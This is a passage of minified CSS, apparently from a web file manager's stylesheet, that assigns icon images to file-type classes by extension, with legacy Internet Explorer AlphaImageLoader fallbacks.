\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none 